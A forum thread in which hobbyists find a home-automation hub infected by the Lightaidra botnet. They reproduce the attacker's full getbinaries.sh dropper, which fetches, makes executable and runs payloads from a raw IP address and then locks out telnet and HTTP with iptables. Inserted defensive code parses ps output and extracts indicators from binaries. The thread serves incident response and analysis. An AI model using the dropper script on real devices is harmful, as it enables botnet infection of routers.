Has somebody been sniffing round my hub?

6 replies [Last post]
mark_baldwin
Offline
Blackburn, United Kingdom
Joined: 19 May 2012

I was having a tinker to see if I could get a flaky homehub up and running. I telnetted into the hub and started typing commands ready to start plugboard up in debug so I can see the incoming RF feeds, then I remembered that last time I was in there I did the same thing, so I started scrolling through the buffer of previous commands.

Instead of the last command I typed, I found these:

echo test

echo connectioncheck

cat /proc/cpuinfo

uname -a

cd /var/www

ls

Looks like someone has been having a snoop :) Good luck to them on taking over :)

allanayr
Offline
Ayr, United Kingdom
Joined: 25 Sep 2011
More sniffing?

I was in my system this morning and in response to a ps I got:

160 root 3628 S /usr/bin/xap-twitter -i br0
163 root 4312 S lua /etc/plugboard/plugboard.lua
231 root 1800 S sh /var/run/getbinaries.sh
237 root 1784 S wget -c http://5.199.130.82/google/mel -P /var/run
612 root 1808 S -ash
620 root 1784 R ps

231 and 237 look a bit suspect. This is what is in getbinaries.sh:

#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.

# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://5.199.130.82/google"
mkdir /var/etc
touch /var/etc/.aidrascan.log
chmod 777 /var/etc/.aidrascan.log

# NAME OF BINARIES:
REFERENCE_MIPSEL="mel"
REFERENCE_MIPS="m"
REFERENCE_SUPERH="s"
REFERENCE_ARM="a"
REFERENCE_PPC="p"

rm -fr /var/run/${REFERENCE_MIPSEL} \
/var/run/${REFERENCE_MIPS} \
/var/run/${REFERENCE_SUPERH} \
/var/run/${REFERENCE_ARM} \
/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
wget -c ${REFERENCE_HTTP}/x -P /var/run && chmod +x /var/run/x && /var/run/x

iptables -A INPUT -p tcp -d 10.0.0.0/8 --dport 23 -j ACCEPT
iptables -A INPUT -p tcp -d 10.0.0.0/8 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -d 127.0.0.0/8 --dport 23 -j ACCEPT
iptables -A INPUT -p tcp -d 127.0.0.0/8 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -d 192.168.0.0/16 --dport 23 -j ACCEPT
iptables -A INPUT -p tcp -d 192.168.0.0/16 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 80 -j DROP

sleep 3;
rm -fr /var/run/getbinaries.sh

Is this some legitimate process or have I been hacked?
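
The two processes allanayr flagged share a pattern that is easy to check for mechanically: a script or binary being executed out of a runtime-writable directory, and a downloader pulling from a bare IP address. The following is an added example (editor's code, not anything from the HAH project or the posters) that parses BusyBox-style `ps` output and flags processes matching that pattern. The sample `ps` text is constructed from the listing in the post above with a header line added; the directory, interpreter and downloader lists are assumptions chosen to suit a small Linux router.

```python
import re

# Constructed sample of BusyBox-style `ps` output, modelled on the listing in the
# post above (header line added; PIDs and commands follow that listing).
SAMPLE_PS = """\
  PID USER       VSZ STAT COMMAND
  160 root      3628 S    /usr/bin/xap-twitter -i br0
  163 root      4312 S    lua /etc/plugboard/plugboard.lua
  231 root      1800 S    sh /var/run/getbinaries.sh
  237 root      1784 S    wget -c http://5.199.130.82/google/mel -P /var/run
  612 root      1808 S    -ash
  620 root      1784 R    ps
"""

# Assumed runtime-writable locations on a small Linux router. Firmware runs from
# flash/squashfs, so something *executing* from one of these is the dropper's signature.
WRITABLE_DIRS = ("/var/run/", "/var/tmp/", "/tmp/", "/dev/shm/")
INTERPRETERS = {"sh", "ash", "bash", "lua", "busybox"}
DOWNLOADERS = {"wget", "curl", "ftpget", "tftp"}
# URL whose host is a literal IPv4 address rather than a hostname.
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/\S*)?")


def parse_ps(text):
    """Parse BusyBox `ps` lines (PID USER VSZ STAT COMMAND) into dicts, skipping the header."""
    procs = []
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5 or not parts[0].isdigit():
            continue
        procs.append({"pid": int(parts[0]), "user": parts[1],
                      "stat": parts[3], "cmd": parts[4]})
    return procs


def suspicious(cmd):
    """Return the reasons a command line matches the dropper pattern; [] means none found."""
    argv = cmd.split()
    reasons = []
    if not argv:
        return reasons
    # A binary run straight out of a writable dir, or an interpreter fed a script from one.
    exe = argv[0]
    script = argv[1] if exe in INTERPRETERS and len(argv) > 1 else None
    for path in (exe, script):
        if path and path.startswith(WRITABLE_DIRS):
            reasons.append("runs from writable dir: " + path)
    # Fetching from a bare IP is exactly how getbinaries.sh pulls its payloads.
    if exe in DOWNLOADERS:
        m = RAW_IP_URL.search(cmd)
        if m:
            reasons.append("download from raw-IP URL: " + m.group(0))
    return reasons


def triage(ps_text):
    """Map PID -> reasons for every process that looks like part of the infection."""
    flagged = {}
    for proc in parse_ps(ps_text):
        reasons = suspicious(proc["cmd"])
        if reasons:
            flagged[proc["pid"]] = reasons
    return flagged


if __name__ == "__main__":
    for pid, reasons in sorted(triage(SAMPLE_PS).items()):
        print(pid, "; ".join(reasons))
```

Run against the sample it reports PIDs 231 and 237 and nothing else; on a real hub you would feed it the output of `ps` captured over the telnet session. The check is deliberately narrow (execution from writable storage, raw-IP downloads) so that the legitimate HAH processes in the listing do not trip it.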

BoxingOrange
Offline
United Kingdom
Joined: 11 Jun 2010
Open Ports

It would be interesting to know if you have set up remote access to your HAH and which ports you have open on your router. It doesn't look good though :(

UPDATE:

OK, so the last executable it downloads, the "x" file, is the bad one. If you download it and look at it with Notepad++ you can see at the end of the file that it looks like some remote bot software. There are a series of IPs and ports as well as a .asp file that looks like they get downloaded. Further on, you can see all the commands that can be executed, i.e. DDOS, SCAN and SYNFLOOD commands.

I'd say YES, you have been hacked. I think you've been hacked with this: http://vierko.org/tech/lightaidra-0x2012/, or at least a version of it.

One key bit of information is a host name "automation.whatsmyip.com", does that belong to anyone here?

allanayr
Offline
Ayr, United Kingdom
Joined: 25 Sep 2011
open ports

The open ports on the box are 22, 23 and 80.

Interestingly enough I just changed my router to a static IP address the other day so perhaps this is why I've been targeted. I hope it's not all over my network by now. Aaaargh!

mark_baldwin
Offline
Blackburn, United Kingdom
Joined: 19 May 2012
I'd kill the processes and

I'd kill the processes and change your password.

I've had nothing since I changed from the default root/admin login.

brett
Offline
Providence, United States
Joined: 9 Jan 2010
I downloaded that MEL binary

I downloaded that MEL binary and it looks like some sort of botnet control backend.

It's some sort of C program, and this particular string looked interesting, as it tells you the name of the program and its version number:

PRIVMSG %s :[version] lightaidra 0x2012.

Popping "lightaidra" into Google gets you some interesting reading on what this program is and does.

I traced back the IP of where this binary is coming from to a provider in Germany and I've contacted them about some suspicious activity being hosted within the IP range they are assigned.

Brett
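
BoxingOrange read the "x" payload in Notepad++ and brett pulled the version string out of "mel"; both were doing by eye what `strings` plus a few regexes does mechanically. The following is an added example (editor's code, not from the posters or the HAH project) that reimplements the `strings` scan and then extracts the indicators the two posts describe: IP:port pairs, download URLs, a .asp path, the uppercase bot command names and the `lightaidra` version tag. The blob it runs on is constructed here to stand in for the real binary, using RFC 5737 documentation addresses rather than the real hosts; the command list and regexes are assumptions for triage, not a decoding of the actual malware.

```python
import re

# Constructed stand-in for the downloaded payload: binary junk with the kinds of
# strings the posts above describe embedded in it. NOT the real binary, and the
# addresses are RFC 5737 documentation ranges, not the real C&C.
SAMPLE_BLOB = (
    b"\x7fELF\x01\x01\x01\x00" + bytes(range(32)) +
    b"PRIVMSG %s :[version] lightaidra 0x2012.\x00"
    b"\x90\x90\x01\x02"
    b"198.51.100.23:6667\x00"
    b"http://198.51.100.23/google/x\x00"
    b"/bot/update.asp\x00"
    b"\xff\xfe"
    b"DDOS\x00SCAN\x00SYNFLOOD\x00"
    b"\xde\xad\xbe\xef"
)

PRINTABLE = frozenset(range(0x20, 0x7f))


def strings(blob, min_len=4):
    """Same idea as `strings -n N`: maximal runs of printable ASCII >= min_len bytes."""
    out, run = [], bytearray()
    for b in blob + b"\x00":          # trailing NUL flushes the final run
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    return out


IPV4_PORT = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?\b")
URL = re.compile(r"https?://[^\s\"']+")
VERSION = re.compile(r"lightaidra\s+(0x[0-9a-fA-F]+)")   # the tag brett quoted
SCRIPT = re.compile(r"\S+\.(?:asp|php|cgi)\b")
# Assumed command vocabulary, taken from the posts plus basic IRC verbs.
BOT_COMMANDS = {"DDOS", "SCAN", "SYNFLOOD", "PRIVMSG", "NICK", "JOIN"}


def extract_iocs(blob):
    """Scan every printable string in the blob and bucket the indicators it contains."""
    iocs = {"ips": set(), "urls": set(), "scripts": set(), "commands": set(), "version": None}
    for s in strings(blob):
        iocs["urls"].update(URL.findall(s))
        for ip, port in IPV4_PORT.findall(s):
            if all(int(octet) <= 255 for octet in ip.split(".")):
                iocs["ips"].add(ip + ":" + port if port else ip)
        iocs["scripts"].update(SCRIPT.findall(s))
        iocs["commands"].update(t for t in re.findall(r"[A-Z]{3,}", s) if t in BOT_COMMANDS)
        m = VERSION.search(s)
        if m:
            iocs["version"] = m.group(1)
    return iocs


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for key, val in extract_iocs(data).items():
        print(key, sorted(val) if isinstance(val, set) else val)
```

Pass a downloaded payload as the first argument to scan it instead of the built-in sample. The output is what you would hand to the hosting provider or put in a firewall deny list; it does not replace disassembly, but it is enough to confirm the family and pull the C&C endpoints without running the binary.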

allanayr
Offline
Ayr, United Kingdom
Joined: 25 Sep 2011
Thanks

Thanks for all your help on this Guys.

Lesson learned! I had been fiddling around with remote access and had moved the box into the DMZ on my router. I didn't really make much progress and kinda forgot that I'd done it.

I'd moved my attention to setting up my RasPi as a VPN server which gives me remote access to the HAH anyway because the LAN is available when I'm logged into the VPN. I had (mistakenly) believed that the root password was not changeable on the HAH and therefore it was still set to admin. I've now moved the box out of the DMZ and reset the root password so hopefully all should be good now.
